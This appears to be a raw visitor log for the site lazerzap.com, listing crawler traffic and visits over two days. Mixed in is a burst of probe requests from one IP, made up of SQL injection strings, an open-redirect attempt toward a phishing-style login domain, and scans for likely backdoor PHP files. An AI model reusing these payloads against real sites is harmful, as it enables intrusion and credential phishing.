Jul 10 - 22:16 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 8.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 22:26 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 10 - 23:31 China 180.76.15.28 http://www.lazerzap.com/index.php/component/ts_files/ts_files/updatetopsites.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 10 - 23:49 Russian Federation 93.158.161.156 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 10 - 23:52 China 60.217.72.16 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown No Referrer Jul 10 - 23:52 China 60.217.72.16 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 No Referrer Jul 10 - 00:36 China 42.236.54.22 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider http://lazerzap.com/ Jul 10 - 01:05 United States 166.62.126.3 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 No Referrer Jul 10 - 01:10 United States 52.53.201.78 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 No Referrer Jul 10 - 01:29 United States 141.212.122.81 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 zgrab/0.x No Referrer Jul 10 - 01:37 China 123.125.71.43 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 10 - 02:24 United States 207.46.13.96 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] iPhone Unknown Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?nn_qp=1&url=http:/www.nonumber.nl/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/magento/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/?q=login.destroy.session&r=0.01231231230 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/admininstrator/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?action=registernew lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?nn_qp=1&url=https%3A%2F%2Fsecure.runescape.co-uk.gq%2Fm%3Dweblogin%2Floginform.ws%3Fmod%3Dwww%26ssl%3D1%26dest%3Dhistory.ws%3D1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/component/users/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?option=com_user&view=login lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?m=wap lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?p=member%2Fsignup%27%20AND%20SLEEP(3)%20oRDeR%20BY%20321%20%23 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?option=com_users&view=registration lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/wp-json/wp/v2/posts/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/wp-json/wp/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/wp-json/wp/v2/posts/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/wp-json/wp/v2/posts/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/wp-json/wp/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/wp-json lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?p=member%2Fsignup%27%20AND%20SLEEP(3)%20oRDeR%20BY%20481%20%23 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/wp-json/wp/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/component/users/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?p=member/signup1111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45)%20--%20%20/* lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/admininstrator/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/magento/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/admininstrator/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/?up_auto_log=true lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/component/users/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?m=search lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://www.lazerzap.com/index.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php?m=admin lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://www.lazerzap.com/index.php?user/create_form/randomimages.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/+/ts_files/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://www.lazerzap.com/index.php?EonList&EpochPrefix&Plugin=Referring%20Domains www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://www.lazerzap.com/index.php/component/visitor_data.html www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:30 Dominica 192.243.55.119 http://lazerzap.com/index.php/magento/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 02:35 Russian Federation 95.139.22.207 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; Win64; rv:33.1) Gecko/20100101 Firefox/33.1 http://lazerzap.com/ Jul 10 - 03:24 Viet Nam 118.69.162.213 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x No Referrer Jul 10 - 03:41 United States 54.36.149.60 http://lazerzap.com/index.php/shop/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 10 - 03:44 United States 54.36.149.94 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 10 - 04:23 Russian Federation 46.161.9.3 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; rv:44.1) Gecko/20100101 Firefox/44.1 https://lazerzap.com/ Jul 10 - 04:28 Russian Federation 93.158.161.17 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 10 - 04:39 United States 207.46.13.96 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 10 - 05:21 Netherlands 46.229.168.69 http://www.lazerzap.com/index.php?user%2Fcreate_form%2Frandomimages.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; SemrushBot/2~bl; +http://www.semrush.com/bot.html) No Referrer Jul 10 - 05:29 China 14.215.176.141 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=copperbpf Jul 10 - 05:56 Ukraine 193.169.252.17 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 http://lazerzap.com/ Jul 10 - 05:56 Russian Federation 5.188.62.117 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 No Referrer Jul 10 - 05:56 Russian Federation 5.188.62.117 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 No Referrer Jul 10 - 05:56 Russian Federation 5.188.62.117 http://lazerzap.com/?author=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 No Referrer Jul 10 - 06:28 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 07:35 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 08:36 China 115.195.69.221 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£© http:// Jul 10 - 09:02 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 09:04 United States 54.36.148.183 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 10 - 09:13 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 09:15 Netherlands 46.229.168.76 http://lazerzap.com/index.php/wp-json/wp/v2/posts/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; SemrushBot/2~bl; +http://www.semrush.com/bot.html) No Referrer Jul 10 - 09:29 United States 208.80.194.27 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 No Referrer Jul 11 - 09:33 172.87.223.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com/ Jul 11 - 09:33 172.87.223.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com Jul 11 - 10:14 104.144.100.153 http://lazerzap.com/? lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 No Referrer Jul 11 - 10:40 Romania 109.102.111.92 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.8.0_141 No Referrer Jul 11 - 10:40 Romania 109.102.111.92 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.8.0_141 No Referrer Jul 11 - 10:49 United States 216.218.222.12 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 http://lazerzap.com/ Jul 11 - 10:50 45.33.248.208 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com/ Jul 11 - 10:50 45.33.248.208 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com Jul 11 - 11:16 Australia 14.201.195.86 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 No Referrer Jul 11 - 11:49 United States 208.80.194.31 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 No Referrer Jul 11 - 11:52 Germany 85.10.204.252 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Unknown Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/2008070208 No Referrer Jul 11 - 12:09 Netherlands 46.229.168.75 http://lazerzap.com/index.php?option=com_user&view=login lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; SemrushBot/2~bl; +http://www.semrush.com/bot.html) No Referrer Jul 11 - 12:14 United Kingdom 178.79.147.224 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 No Referrer Jul 11 - 12:25 United States 54.36.149.11 http://lazerzap.com/index.php/wp-json/wp/v2/posts/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 12:27 United States 54.36.148.114 http://lazerzap.com/index.php/component/users/ts_files/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 12:46 United States 54.36.149.6 http://lazerzap.com/index.php/trackback/ts_files/scroll.js 